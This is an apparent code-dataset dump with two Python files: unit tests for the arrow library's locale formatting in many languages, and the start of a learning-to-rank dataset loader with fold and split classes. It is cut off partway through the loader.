content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from chai import Chai
from arrow import arrow, locales
class ModuleTests(Chai):
    def test_get_locale(self):
        # Stub the registry so get_locale resolves entirely through mocks:
        # name lookup yields a class, calling the class yields the instance.
        fake_registry = self.mock(locales, "_locales")
        fake_locale_cls = self.mock()
        fake_locale_obj = self.mock()
        self.expect(fake_registry.get).args("name").returns(fake_locale_cls)
        self.expect(fake_locale_cls).returns(fake_locale_obj)
        self.assertEqual(locales.get_locale("name"), fake_locale_obj)

    def test_locales(self):
        # The locale registry must not be empty.
        self.assertTrue(len(locales._locales) > 0)
class LocaleTests(Chai):
    def setUp(self):
        super(LocaleTests, self).setUp()
        self.locale = locales.EnglishLocale()

    def test_format_timeframe(self):
        self.assertEqual(self.locale._format_timeframe("hours", 2), "2 hours")
        self.assertEqual(self.locale._format_timeframe("hour", 0), "an hour")

    def test_format_relative_now(self):
        self.assertEqual(self.locale._format_relative("just now", "now", 0), "just now")

    def test_format_relative_past(self):
        # Positive delta formats as a future expression.
        self.assertEqual(
            self.locale._format_relative("an hour", "hour", 1), "in an hour"
        )

    def test_format_relative_future(self):
        # Negative delta formats as a past expression.
        self.assertEqual(
            self.locale._format_relative("an hour", "hour", -1), "an hour ago"
        )

    def test_ordinal_number(self):
        # Covers the st/nd/rd/th suffix rules, including the 11-13 exceptions
        # that always take "th".
        cases = [
            (0, "0th"), (1, "1st"), (2, "2nd"), (3, "3rd"), (4, "4th"),
            (10, "10th"), (11, "11th"), (12, "12th"), (13, "13th"), (14, "14th"),
            (21, "21st"), (22, "22nd"), (23, "23rd"), (24, "24th"),
            (100, "100th"), (101, "101st"), (102, "102nd"), (103, "103rd"),
            (104, "104th"), (110, "110th"), (111, "111th"), (112, "112th"),
            (113, "113th"), (114, "114th"), (121, "121st"), (122, "122nd"),
            (123, "123rd"), (124, "124th"),
        ]
        for number, expected in cases:
            self.assertEqual(self.locale.ordinal_number(number), expected)

    def test_meridian_invalid_token(self):
        # Unknown meridian tokens yield None.
        for token in (None, "B", "NONSENSE"):
            self.assertEqual(self.locale.meridian(7, token), None)
class EnglishLocaleTests(Chai):
    def setUp(self):
        super(EnglishLocaleTests, self).setUp()
        self.locale = locales.EnglishLocale()

    def test_describe(self):
        # only_distance=True drops the relative phrasing.
        for only_distance, expected in ((True, "instantly"), (False, "just now")):
            self.assertEqual(
                self.locale.describe("now", only_distance=only_distance), expected
            )
class ItalianLocalesTests(Chai):
    def test_ordinal_number(self):
        # Italian ordinals use the masculine ordinal indicator.
        self.assertEqual(locales.ItalianLocale().ordinal_number(1), "1º")
class SpanishLocalesTests(Chai):
    def test_ordinal_number(self):
        # Spanish ordinals use the masculine ordinal indicator.
        self.assertEqual(locales.SpanishLocale().ordinal_number(1), "1º")
class FrenchLocalesTests(Chai):
    def test_ordinal_number(self):
        # 1 takes "er" (premier); other numbers take the generic "e" suffix.
        french = locales.FrenchLocale()
        self.assertEqual(french.ordinal_number(1), "1er")
        self.assertEqual(french.ordinal_number(2), "2e")
class RussianLocalesTests(Chai):
    def test_plurals2(self):
        locale = locales.RussianLocale()
        # Masculine noun ("час") declined by count.
        hour_cases = [
            (0, "0 часов"), (1, "1 час"), (2, "2 часа"), (4, "4 часа"),
            (5, "5 часов"), (21, "21 час"), (22, "22 часа"), (25, "25 часов"),
        ]
        for delta, expected in hour_cases:
            self.assertEqual(locale._format_timeframe("hours", delta), expected)
        # Feminine noun ("минута") declined by count; broader feminine
        # grammatical-gender coverage should be tested separately.
        minute_cases = [
            (0, "0 минут"), (1, "1 минуту"), (2, "2 минуты"), (4, "4 минуты"),
            (5, "5 минут"), (21, "21 минуту"), (22, "22 минуты"), (25, "25 минут"),
        ]
        for delta, expected in minute_cases:
            self.assertEqual(locale._format_timeframe("minutes", delta), expected)
class PolishLocalesTests(Chai):
    def test_plurals(self):
        locale = locales.PolishLocale()
        # NOTE(review): "1 godzin" looks grammatically odd (vs "1 godzina")
        # but matches the locale's current output — confirm upstream.
        cases = [
            (0, "0 godzin"), (1, "1 godzin"), (2, "2 godziny"), (4, "4 godziny"),
            (5, "5 godzin"), (21, "21 godzin"), (22, "22 godziny"), (25, "25 godzin"),
        ]
        for delta, expected in cases:
            self.assertEqual(locale._format_timeframe("hours", delta), expected)
class IcelandicLocalesTests(Chai):
    def setUp(self):
        super(IcelandicLocalesTests, self).setUp()
        self.locale = locales.IcelandicLocale()

    def test_format_timeframe(self):
        # Past (negative) and future (positive) deltas select different cases.
        cases = [
            ("minute", -1, "einni mínútu"),
            ("minute", 1, "eina mínútu"),
            ("hours", -2, "2 tímum"),
            ("hours", 2, "2 tíma"),
            ("now", 0, "rétt í þessu"),
        ]
        for timeframe, delta, expected in cases:
            self.assertEqual(self.locale._format_timeframe(timeframe, delta), expected)
class MalayalamLocaleTests(Chai):
    def setUp(self):
        super(MalayalamLocaleTests, self).setUp()
        self.locale = locales.MalayalamLocale()

    def test_format_timeframe(self):
        self.assertEqual(self.locale._format_timeframe("hours", 2), "2 മണിക്കൂർ")
        self.assertEqual(self.locale._format_timeframe("hour", 0), "ഒരു മണിക്കൂർ")

    def test_format_relative_now(self):
        self.assertEqual(self.locale._format_relative("ഇപ്പോൾ", "now", 0), "ഇപ്പോൾ")

    def test_format_relative_past(self):
        # Positive delta appends the future suffix.
        self.assertEqual(
            self.locale._format_relative("ഒരു മണിക്കൂർ", "hour", 1),
            "ഒരു മണിക്കൂർ ശേഷം",
        )

    def test_format_relative_future(self):
        # Negative delta appends the past suffix.
        self.assertEqual(
            self.locale._format_relative("ഒരു മണിക്കൂർ", "hour", -1),
            "ഒരു മണിക്കൂർ മുമ്പ്",
        )
class HindiLocaleTests(Chai):
    def setUp(self):
        super(HindiLocaleTests, self).setUp()
        self.locale = locales.HindiLocale()

    def test_format_timeframe(self):
        self.assertEqual(self.locale._format_timeframe("hours", 2), "2 घंटे")
        self.assertEqual(self.locale._format_timeframe("hour", 0), "एक घंटा")

    def test_format_relative_now(self):
        self.assertEqual(self.locale._format_relative("अभी", "now", 0), "अभी")

    def test_format_relative_past(self):
        # Positive delta appends the future suffix.
        self.assertEqual(
            self.locale._format_relative("एक घंटा", "hour", 1), "एक घंटा बाद"
        )

    def test_format_relative_future(self):
        # Negative delta appends the past suffix.
        self.assertEqual(
            self.locale._format_relative("एक घंटा", "hour", -1), "एक घंटा पहले"
        )
class CzechLocaleTests(Chai):
    def setUp(self):
        super(CzechLocaleTests, self).setUp()
        self.locale = locales.CzechLocale()

    def test_format_timeframe(self):
        # The sign of the delta selects between future and past declensions.
        cases = [
            ("hours", 2, "2 hodiny"),
            ("hours", 5, "5 hodin"),
            ("hour", 0, "0 hodin"),
            ("hours", -2, "2 hodinami"),
            ("hours", -5, "5 hodinami"),
            ("now", 0, "Teď"),
        ]
        for timeframe, delta, expected in cases:
            self.assertEqual(self.locale._format_timeframe(timeframe, delta), expected)

    def test_format_relative_now(self):
        self.assertEqual(self.locale._format_relative("Teď", "now", 0), "Teď")

    def test_format_relative_future(self):
        self.assertEqual(self.locale._format_relative("hodinu", "hour", 1), "Za hodinu")

    def test_format_relative_past(self):
        self.assertEqual(
            self.locale._format_relative("hodinou", "hour", -1), "Před hodinou"
        )
class SlovakLocaleTests(Chai):
    def setUp(self):
        super(SlovakLocaleTests, self).setUp()
        self.locale = locales.SlovakLocale()

    def test_format_timeframe(self):
        # The sign of the delta selects between future and past declensions.
        cases = [
            ("hours", 2, "2 hodiny"),
            ("hours", 5, "5 hodín"),
            ("hour", 0, "0 hodín"),
            ("hours", -2, "2 hodinami"),
            ("hours", -5, "5 hodinami"),
            ("now", 0, "Teraz"),
        ]
        for timeframe, delta, expected in cases:
            self.assertEqual(self.locale._format_timeframe(timeframe, delta), expected)

    def test_format_relative_now(self):
        self.assertEqual(self.locale._format_relative("Teraz", "now", 0), "Teraz")

    def test_format_relative_future(self):
        self.assertEqual(self.locale._format_relative("hodinu", "hour", 1), "O hodinu")

    def test_format_relative_past(self):
        self.assertEqual(
            self.locale._format_relative("hodinou", "hour", -1), "Pred hodinou"
        )
class BulgarianLocaleTests(Chai):
    def test_plurals2(self):
        locale = locales.BulgarianLocale()
        # Masculine noun ("час") forms by count.
        hour_cases = [
            (0, "0 часа"), (1, "1 час"), (2, "2 часа"), (4, "4 часа"),
            (5, "5 часа"), (21, "21 час"), (22, "22 часа"), (25, "25 часа"),
        ]
        for delta, expected in hour_cases:
            self.assertEqual(locale._format_timeframe("hours", delta), expected)
        # Feminine noun ("минута") forms by count; broader feminine
        # grammatical-gender coverage should be tested separately.
        minute_cases = [
            (0, "0 минути"), (1, "1 минута"), (2, "2 минути"), (4, "4 минути"),
            (5, "5 минути"), (21, "21 минута"), (22, "22 минути"), (25, "25 минути"),
        ]
        for delta, expected in minute_cases:
            self.assertEqual(locale._format_timeframe("minutes", delta), expected)
class MacedonianLocaleTests(Chai):
    def test_plurals_mk(self):
        locale = locales.MacedonianLocale()
        # "now" passes through unchanged.
        self.assertEqual(locale._format_relative("сега", "now", 0), "сега")
        # Hours: singular form only for counts ending in 1 (except 11).
        hour_cases = [
            (0, "0 саати"), (1, "1 саат"), (2, "2 саати"), (4, "4 саати"),
            (5, "5 саати"), (21, "21 саат"), (22, "22 саати"), (25, "25 саати"),
        ]
        for delta, expected in hour_cases:
            self.assertEqual(locale._format_timeframe("hours", delta), expected)
        # Minutes follow the same pattern with the feminine noun.
        minute_cases = [
            (0, "0 минути"), (1, "1 минута"), (2, "2 минути"), (4, "4 минути"),
            (5, "5 минути"), (21, "21 минута"), (22, "22 минути"), (25, "25 минути"),
        ]
        for delta, expected in minute_cases:
            self.assertEqual(locale._format_timeframe("minutes", delta), expected)
class HebrewLocaleTests(Chai):
    def test_couple_of_timeframe(self):
        locale = locales.HebrewLocale()
        # A count of exactly two uses the special dual form with no digit.
        dual_cases = [
            ("hours", "שעתיים"),
            ("months", "חודשיים"),
            ("days", "יומיים"),
            ("years", "שנתיים"),
        ]
        for timeframe, expected in dual_cases:
            self.assertEqual(locale._format_timeframe(timeframe, 2), expected)
        # Larger counts use the regular plural prefixed with the digit.
        plural_cases = [
            ("hours", 3, "3 שעות"),
            ("months", 4, "4 חודשים"),
            ("days", 3, "3 ימים"),
            ("years", 5, "5 שנים"),
        ]
        for timeframe, delta, expected in plural_cases:
            self.assertEqual(locale._format_timeframe(timeframe, delta), expected)
class MarathiLocaleTests(Chai):
    def setUp(self):
        super(MarathiLocaleTests, self).setUp()
        self.locale = locales.MarathiLocale()

    def test_dateCoreFunctionality(self):
        # 2015-04-11 is a Saturday in April.
        dt = arrow.Arrow(2015, 4, 11, 17, 30, 0)
        self.assertEqual(self.locale.month_name(dt.month), "एप्रिल")
        self.assertEqual(self.locale.month_abbreviation(dt.month), "एप्रि")
        self.assertEqual(self.locale.day_name(dt.isoweekday()), "शनिवार")
        self.assertEqual(self.locale.day_abbreviation(dt.isoweekday()), "शनि")

    def test_format_timeframe(self):
        self.assertEqual(self.locale._format_timeframe("hours", 2), "2 तास")
        self.assertEqual(self.locale._format_timeframe("hour", 0), "एक तास")

    def test_format_relative_now(self):
        self.assertEqual(self.locale._format_relative("सद्य", "now", 0), "सद्य")

    def test_format_relative_past(self):
        self.assertEqual(
            self.locale._format_relative("एक तास", "hour", 1), "एक तास नंतर"
        )

    def test_format_relative_future(self):
        self.assertEqual(
            self.locale._format_relative("एक तास", "hour", -1), "एक तास आधी"
        )

    def test_ordinal_number(self):
        # Ordinal suffixes are not currently implemented for Marathi;
        # the number is returned unchanged.
        self.assertEqual(self.locale.ordinal_number(1), "1")
class FinnishLocaleTests(Chai):
    def setUp(self):
        super(FinnishLocaleTests, self).setUp()
        self.locale = locales.FinnishLocale()

    def test_format_timeframe(self):
        # Finnish timeframes come as (nominative, genitive) pairs.
        self.assertEqual(
            self.locale._format_timeframe("hours", 2), ("2 tuntia", "2 tunnin")
        )
        self.assertEqual(self.locale._format_timeframe("hour", 0), ("tunti", "tunnin"))

    def test_format_relative_now(self):
        self.assertEqual(
            self.locale._format_relative(["juuri nyt", "juuri nyt"], "now", 0),
            "juuri nyt",
        )

    def test_format_relative_past(self):
        # Positive delta picks the second (genitive) form plus "kuluttua".
        self.assertEqual(
            self.locale._format_relative(["tunti", "tunnin"], "hour", 1),
            "tunnin kuluttua",
        )

    def test_format_relative_future(self):
        # Negative delta picks the first (nominative) form plus "sitten".
        self.assertEqual(
            self.locale._format_relative(["tunti", "tunnin"], "hour", -1),
            "tunti sitten",
        )

    def test_ordinal_number(self):
        self.assertEqual(self.locale.ordinal_number(1), "1.")
class GermanLocaleTests(Chai):
    def setUp(self):
        super(GermanLocaleTests, self).setUp()
        self.locale = locales.GermanLocale()

    def test_ordinal_number(self):
        self.assertEqual(self.locale.ordinal_number(1), "1.")

    def test_define(self):
        # Each timeframe: bare distance vs. full relative ("in ...") phrasing.
        cases = [
            ("minute", "eine Minute", "in einer Minute"),
            ("hour", "eine Stunde", "in einer Stunde"),
            ("day", "ein Tag", "in einem Tag"),
            ("month", "ein Monat", "in einem Monat"),
            ("year", "ein Jahr", "in einem Jahr"),
        ]
        for timeframe, distance_only, relative in cases:
            self.assertEqual(
                self.locale.describe(timeframe, only_distance=True), distance_only
            )
            self.assertEqual(
                self.locale.describe(timeframe, only_distance=False), relative
            )
class HungarianLocaleTests(Chai):
    def setUp(self):
        super(HungarianLocaleTests, self).setUp()
        self.locale = locales.HungarianLocale()

    def test_format_timeframe(self):
        cases = [
            ("hours", 2, "2 óra"),
            ("hour", 0, "egy órával"),
            ("hours", -2, "2 órával"),
            ("now", 0, "éppen most"),
        ]
        for timeframe, delta, expected in cases:
            self.assertEqual(self.locale._format_timeframe(timeframe, delta), expected)
class EsperantoLocaleTests(Chai):
    def setUp(self):
        super(EsperantoLocaleTests, self).setUp()
        self.locale = locales.EsperantoLocale()

    def test_format_timeframe(self):
        cases = [
            ("hours", 2, "2 horoj"),
            ("hour", 0, "un horo"),
            ("hours", -2, "2 horoj"),
            ("now", 0, "nun"),
        ]
        for timeframe, delta, expected in cases:
            self.assertEqual(self.locale._format_timeframe(timeframe, delta), expected)

    def test_ordinal_number(self):
        self.assertEqual(self.locale.ordinal_number(1), "1a")
class ThaiLocaleTests(Chai):
    def setUp(self):
        super(ThaiLocaleTests, self).setUp()
        self.locale = locales.ThaiLocale()

    def test_year_full(self):
        # Thai years use the Buddhist era (CE + 543).
        self.assertEqual(self.locale.year_full(2015), "2558")

    def test_year_abbreviation(self):
        self.assertEqual(self.locale.year_abbreviation(2015), "58")

    def test_format_relative_now(self):
        self.assertEqual(self.locale._format_relative("ขณะนี้", "now", 0), "ขณะนี้")

    def test_format_relative_past(self):
        self.assertEqual(
            self.locale._format_relative("1 ชั่วโมง", "hour", 1), "ในอีก 1 ชั่วโมง"
        )
        self.assertEqual(
            self.locale._format_relative("{0} ชั่วโมง", "hours", 2), "ในอีก {0} ชั่วโมง"
        )
        # Note: no space after the prefix for the "seconds" timeframe.
        self.assertEqual(
            self.locale._format_relative("ไม่กี่วินาที", "seconds", 42), "ในอีกไม่กี่วินาที"
        )

    def test_format_relative_future(self):
        self.assertEqual(
            self.locale._format_relative("1 ชั่วโมง", "hour", -1), "1 ชั่วโมง ที่ผ่านมา"
        )
class BengaliLocaleTests(Chai):
    def setUp(self):
        super(BengaliLocaleTests, self).setUp()
        self.locale = locales.BengaliLocale()

    def test_ordinal_number(self):
        cases = [
            (0, "0তম"), (1, "1ম"), (3, "3য়"), (4, "4র্থ"), (5, "5ম"),
            (6, "6ষ্ঠ"), (10, "10ম"), (11, "11তম"), (42, "42তম"),
        ]
        for number, expected in cases:
            self.assertEqual(self.locale._ordinal_number(number), expected)
        # Negative input is unsupported and yields None.
        self.assertEqual(self.locale._ordinal_number(-1), None)
class SwissLocaleTests(Chai):
    def setUp(self):
        super(SwissLocaleTests, self).setUp()
        self.locale = locales.SwissLocale()

    # Renamed from the misleading test_ordinal_number: the assertions
    # exercise _format_timeframe and day_abbreviation, not ordinal numbers.
    def test_format_timeframe(self):
        dt = arrow.Arrow(2015, 4, 11, 17, 30, 0)  # a Saturday
        self.assertEqual(self.locale._format_timeframe("minute", 1), "einer Minute")
        self.assertEqual(self.locale._format_timeframe("hour", 1), "einer Stunde")
        self.assertEqual(self.locale.day_abbreviation(dt.isoweekday()), "Sa")
class RomanianLocaleTests(Chai):
    def setUp(self):
        super(RomanianLocaleTests, self).setUp()
        self.locale = locales.RomanianLocale()

    def test_timeframes(self):
        cases = [
            ("hours", 2, "2 ore"),
            ("months", 2, "2 luni"),
            ("days", 2, "2 zile"),
            ("years", 2, "2 ani"),
            ("hours", 3, "3 ore"),
            ("months", 4, "4 luni"),
            ("days", 3, "3 zile"),
            ("years", 5, "5 ani"),
        ]
        for timeframe, delta, expected in cases:
            self.assertEqual(self.locale._format_timeframe(timeframe, delta), expected)

    def test_relative_timeframes(self):
        # Future (positive) deltas get "peste ...", past (negative) "... în urmă".
        cases = [
            ("acum", "now", 0, "acum"),
            ("o oră", "hour", 1, "peste o oră"),
            ("o oră", "hour", -1, "o oră în urmă"),
            ("un minut", "minute", 1, "peste un minut"),
            ("un minut", "minute", -1, "un minut în urmă"),
            ("câteva secunde", "seconds", -1, "câteva secunde în urmă"),
            ("câteva secunde", "seconds", 1, "peste câteva secunde"),
            ("o zi", "day", -1, "o zi în urmă"),
            ("o zi", "day", 1, "peste o zi"),
        ]
        for humanized, timeframe, delta, expected in cases:
            self.assertEqual(
                self.locale._format_relative(humanized, timeframe, delta), expected
            )
class ArabicLocalesTest(Chai):
    def setUp(self):
        super(ArabicLocalesTest, self).setUp()
        self.locale = locales.ArabicLocale()

    def test_timeframes(self):
        # Singular: the bare noun, no digit.
        singular = [
            ("minute", "دقيقة"), ("hour", "ساعة"), ("day", "يوم"),
            ("month", "شهر"), ("year", "سنة"),
        ]
        for timeframe, expected in singular:
            self.assertEqual(self.locale._format_timeframe(timeframe, 1), expected)
        # Dual (exactly two): a dedicated form, also without a digit.
        dual = [
            ("minutes", "دقيقتين"), ("hours", "ساعتين"), ("days", "يومين"),
            ("months", "شهرين"), ("years", "سنتين"),
        ]
        for timeframe, expected in dual:
            self.assertEqual(self.locale._format_timeframe(timeframe, 2), expected)
        # Three to ten: digit plus the plural noun.
        few = [
            ("minutes", 3, "3 دقائق"), ("hours", 4, "4 ساعات"),
            ("days", 5, "5 أيام"), ("months", 6, "6 أشهر"),
            ("years", 10, "10 سنوات"),
        ]
        for timeframe, delta, expected in few:
            self.assertEqual(self.locale._format_timeframe(timeframe, delta), expected)
        # Above ten: digit plus the singular noun again.
        many = [
            ("minutes", 11, "11 دقيقة"), ("hours", 19, "19 ساعة"),
            ("months", 24, "24 شهر"), ("days", 50, "50 يوم"),
            ("years", 115, "115 سنة"),
        ]
        for timeframe, delta, expected in many:
            self.assertEqual(self.locale._format_timeframe(timeframe, delta), expected)
class NepaliLocaleTests(Chai):
    def setUp(self):
        super(NepaliLocaleTests, self).setUp()
        self.locale = locales.NepaliLocale()

    def test_format_timeframe(self):
        self.assertEqual(self.locale._format_timeframe("hours", 3), "3 घण्टा")
        self.assertEqual(self.locale._format_timeframe("hour", 0), "एक घण्टा")

    def test_format_relative_now(self):
        self.assertEqual(self.locale._format_relative("अहिले", "now", 0), "अहिले")

    def test_format_relative_future(self):
        self.assertEqual(
            self.locale._format_relative("एक घण्टा", "hour", 1), "एक घण्टा पछी"
        )

    def test_format_relative_past(self):
        self.assertEqual(
            self.locale._format_relative("एक घण्टा", "hour", -1), "एक घण्टा पहिले"
        )
class IndonesianLocaleTests(Chai):
    def setUp(self):
        super(IndonesianLocaleTests, self).setUp()
        self.locale = locales.IndonesianLocale()

    def test_timeframes(self):
        cases = [
            ("hours", 2, "2 jam"),
            ("months", 2, "2 bulan"),
            ("days", 2, "2 hari"),
            ("years", 2, "2 tahun"),
            ("hours", 3, "3 jam"),
            ("months", 4, "4 bulan"),
            ("days", 3, "3 hari"),
            ("years", 5, "5 tahun"),
        ]
        for timeframe, delta, expected in cases:
            self.assertEqual(self.locale._format_timeframe(timeframe, delta), expected)

    def test_format_relative_now(self):
        self.assertEqual(
            self.locale._format_relative("baru saja", "now", 0), "baru saja"
        )

    def test_format_relative_past(self):
        # Positive deltas are prefixed with "dalam".
        self.assertEqual(
            self.locale._format_relative("1 jam", "hour", 1), "dalam 1 jam"
        )
        self.assertEqual(
            self.locale._format_relative("1 detik", "seconds", 1), "dalam 1 detik"
        )

    def test_format_relative_future(self):
        # Negative deltas are suffixed with "yang lalu".
        self.assertEqual(
            self.locale._format_relative("1 jam", "hour", -1), "1 jam yang lalu"
        )
class TagalogLocaleTests(Chai):
    def setUp(self):
        super(TagalogLocaleTests, self).setUp()
        self.locale = locales.TagalogLocale()

    def test_format_timeframe(self):
        cases = [
            ("minute", 1, "isang minuto"),
            ("hour", 1, "isang oras"),
            ("month", 1, "isang buwan"),
            ("year", 1, "isang taon"),
            ("seconds", 2, "segundo"),
            ("minutes", 3, "3 minuto"),
            ("hours", 4, "4 oras"),
            ("months", 5, "5 buwan"),
            ("years", 6, "6 taon"),
        ]
        for timeframe, delta, expected in cases:
            self.assertEqual(self.locale._format_timeframe(timeframe, delta), expected)

    def test_format_relative_now(self):
        self.assertEqual(
            self.locale._format_relative("ngayon lang", "now", 0), "ngayon lang"
        )

    def test_format_relative_past(self):
        self.assertEqual(
            self.locale._format_relative("2 oras", "hour", 2), "2 oras mula ngayon"
        )

    def test_format_relative_future(self):
        self.assertEqual(
            self.locale._format_relative("3 oras", "hour", -3), "nakaraang 3 oras"
        )

    def test_ordinal_number(self):
        # All ordinals take the "ika-" prefix uniformly.
        for number in (0, 1, 2, 3, 10, 23, 100, 103, 114):
            self.assertEqual(self.locale.ordinal_number(number), "ika-%d" % number)
class EstonianLocaleTests(Chai):
    def setUp(self):
        super(EstonianLocaleTests, self).setUp()
        self.locale = locales.EstonianLocale()

    def test_format_timeframe(self):
        # Positive (future) deltas use one grammatical form, negative (past)
        # deltas another — both directions are covered for every timeframe.
        future_cases = [
            ("now", 0, "just nüüd"),
            ("second", 1, "ühe sekundi"),
            ("seconds", 3, "3 sekundi"),
            ("seconds", 30, "30 sekundi"),
            ("minute", 1, "ühe minuti"),
            ("minutes", 4, "4 minuti"),
            ("minutes", 40, "40 minuti"),
            ("hour", 1, "tunni aja"),
            ("hours", 5, "5 tunni"),
            ("hours", 23, "23 tunni"),
            ("day", 1, "ühe päeva"),
            ("days", 6, "6 päeva"),
            ("days", 12, "12 päeva"),
            ("month", 1, "ühe kuu"),
            ("months", 7, "7 kuu"),
            ("months", 11, "11 kuu"),
            ("year", 1, "ühe aasta"),
            ("years", 8, "8 aasta"),
            ("years", 12, "12 aasta"),
        ]
        past_cases = [
            ("now", 0, "just nüüd"),
            ("second", -1, "üks sekund"),
            ("seconds", -9, "9 sekundit"),
            ("seconds", -12, "12 sekundit"),
            ("minute", -1, "üks minut"),
            ("minutes", -2, "2 minutit"),
            ("minutes", -10, "10 minutit"),
            ("hour", -1, "tund aega"),
            ("hours", -3, "3 tundi"),
            ("hours", -11, "11 tundi"),
            ("day", -1, "üks päev"),
            ("days", -2, "2 päeva"),
            ("days", -12, "12 päeva"),
            ("month", -1, "üks kuu"),
            ("months", -3, "3 kuud"),
            ("months", -13, "13 kuud"),
            ("year", -1, "üks aasta"),
            ("years", -4, "4 aastat"),
            ("years", -14, "14 aastat"),
        ]
        for timeframe, delta, expected in future_cases + past_cases:
            self.assertEqual(self.locale._format_timeframe(timeframe, delta), expected)
|
python
|
# -*- coding: utf-8 -*-
# Copyright (C) H.R. Oosterhuis 2021.
# Distributed under the MIT License (see the accompanying README.md and LICENSE files).
import numpy as np
import os.path
import gc
import json
FOLDDATA_WRITE_VERSION = 4
def _add_zero_to_vector(vector):
return np.concatenate([np.zeros(1, dtype=vector.dtype), vector])
def get_dataset_from_json_info(
        dataset_name,
        info_path,
        store_pickle_after_read=True,
        read_from_pickle=True,
        feature_normalization=True,
        purge_test_set=True):
    """Look up *dataset_name* in the JSON info file and build a DataSet.

    Bug fix: store_pickle_after_read, read_from_pickle,
    feature_normalization and purge_test_set were accepted here but never
    forwarded, so DataSet always fell back to its own defaults. They are
    now passed through.

    Args:
        dataset_name: key of the dataset inside the info file.
        info_path: path to the JSON file describing all datasets.
        store_pickle_after_read: cache parsed folds as pickles.
        read_from_pickle: read cached pickles when available.
        feature_normalization: use the unique-feature count (normalized
            features) instead of the raw non-zero feature count.
        purge_test_set: drop queries without relevant documents.

    Returns:
        A DataSet configured from the info file entry.
    """
    with open(info_path) as f:
        all_info = json.load(f)
    assert dataset_name in all_info, 'Dataset: %s not found in info file: %s' % (dataset_name, all_info.keys())
    set_info = all_info[dataset_name]
    assert set_info['num_folds'] == len(set_info['fold_paths']), 'Missing fold paths for %s' % dataset_name
    # Normalization collapses duplicate feature columns, so the effective
    # feature count differs between the two modes.
    if feature_normalization:
        num_feat = set_info['num_unique_feat']
    else:
        num_feat = set_info['num_nonzero_feat']
    return DataSet(dataset_name,
                   set_info['fold_paths'],
                   set_info['num_relevance_labels'],
                   num_feat,
                   set_info['num_nonzero_feat'],
                   store_pickle_after_read=store_pickle_after_read,
                   read_from_pickle=read_from_pickle,
                   feature_normalization=feature_normalization,
                   purge_test_set=purge_test_set,
                   already_normalized=set_info['query_normalized'])
class DataSet(object):
    """
    Class designed to manage meta-data for datasets.
    """
    def __init__(self,
                 name,
                 data_paths,
                 num_rel_labels,
                 num_features,
                 num_nonzero_feat,
                 store_pickle_after_read=True,
                 read_from_pickle=True,
                 feature_normalization=True,
                 purge_test_set=True,
                 already_normalized=False):
        """Store dataset meta-data; no data is read here.

        Args:
            name: dataset identifier.
            data_paths: one path per fold.
            num_rel_labels: number of distinct relevance labels.
            num_features: feature-vector dimensionality.
            num_nonzero_feat: number of features with non-zero values.
            store_pickle_after_read: cache parsed folds as pickles.
            read_from_pickle: read cached pickles when available.
            feature_normalization: min/max-normalize features per query.
            purge_test_set: drop queries without relevant documents.
            already_normalized: data is already query-normalized.
        """
        self.name = name
        self.num_rel_labels = num_rel_labels
        self.num_features = num_features
        self.data_paths = data_paths
        self.store_pickle_after_read = store_pickle_after_read
        self.read_from_pickle = read_from_pickle
        self.feature_normalization = feature_normalization
        self.purge_test_set = purge_test_set
        # Bug fix: already_normalized was accepted but silently dropped;
        # store it so consumers can skip re-normalizing normalized data.
        self.already_normalized = already_normalized
        self._num_nonzero_feat = num_nonzero_feat

    def num_folds(self):
        """Return the number of folds (one per data path)."""
        return len(self.data_paths)

    def get_data_folds(self):
        """Instantiate one DataFold wrapper per fold path."""
        return [DataFold(self, i, path) for i, path in enumerate(self.data_paths)]
class DataFoldSplit(object):
    """One split (e.g. train/validation/test) of a dataset fold.

    Documents of all queries are stored in flat arrays; query i owns rows
    doclist_ranges[i]:doclist_ranges[i+1] of feature_matrix/label_vector.
    Consistency fix: the slice bounds are now derived in one place
    (query_range) instead of being re-computed in four methods.
    """
    def __init__(self, datafold, name, doclist_ranges, feature_matrix, label_vector):
        self.datafold = datafold
        self.name = name
        self.doclist_ranges = doclist_ranges
        self.feature_matrix = feature_matrix
        self.label_vector = label_vector

    def num_queries(self):
        """Return the number of queries in this split."""
        return self.doclist_ranges.shape[0] - 1

    def num_docs(self):
        """Return the total number of documents across all queries."""
        return self.feature_matrix.shape[0]

    def query_range(self, query_index):
        """Return the (start, end) row bounds of one query's documents."""
        s_i = self.doclist_ranges[query_index]
        e_i = self.doclist_ranges[query_index + 1]
        return s_i, e_i

    def query_values_from_vector(self, qid, vector):
        """Slice a per-document vector down to one query's documents."""
        s_i, e_i = self.query_range(qid)
        return vector[s_i:e_i]

    def query_size(self, query_index):
        """Return the number of documents of a single query."""
        s_i, e_i = self.query_range(query_index)
        return e_i - s_i

    def query_sizes(self):
        """Return a vector with the document count of every query."""
        return (self.doclist_ranges[1:] - self.doclist_ranges[:-1])

    def max_query_size(self):
        """Return the largest document count over all queries."""
        return np.amax(self.query_sizes())

    def query_labels(self, query_index):
        """Return the relevance labels of one query's documents."""
        s_i, e_i = self.query_range(query_index)
        return self.label_vector[s_i:e_i]

    def query_feat(self, query_index):
        """Return the feature rows of one query's documents."""
        s_i, e_i = self.query_range(query_index)
        return self.feature_matrix[s_i:e_i, :]

    def doc_feat(self, query_index, doc_index):
        """Return the feature vector of one document within a query."""
        s_i, e_i = self.query_range(query_index)
        assert s_i + doc_index < e_i
        return self.feature_matrix[s_i + doc_index, :]

    def doc_str(self, query_index, doc_index):
        """Return a sparse 'feature:value' string for one document."""
        doc_feat = self.doc_feat(query_index, doc_index)
        feat_i = np.where(doc_feat)[0]
        doc_str = ''
        for f_i in feat_i:
            # feature_map presumably maps matrix columns to original feature
            # ids -- defined on the owning datafold; confirm against loader.
            doc_str += '%s:%f ' % (self.datafold.feature_map[f_i], doc_feat[f_i])
        return doc_str
class DataFold(object):
  """
  One cross-validation fold of a dataset.

  Reads the fold folder's train/vali/test files in LETOR format (with
  optional pickle caching), normalizes features, and exposes the three
  splits as DataFoldSplit objects.
  """

  def __init__(self, dataset, fold_num, data_path):
    """
    Args:
      dataset: owning DataSet; its settings are copied onto this fold.
      fold_num: index of this fold.
      data_path: folder containing train.txt, vali.txt and test.txt.
    """
    self.name = dataset.name
    self.num_rel_labels = dataset.num_rel_labels
    self.num_features = dataset.num_features
    self.fold_num = fold_num
    self.data_path = data_path
    self._data_ready = False
    self.store_pickle_after_read = dataset.store_pickle_after_read
    self.read_from_pickle = dataset.read_from_pickle
    self.feature_normalization = dataset.feature_normalization
    self.purge_test_set = dataset.purge_test_set
    self._num_nonzero_feat = dataset._num_nonzero_feat

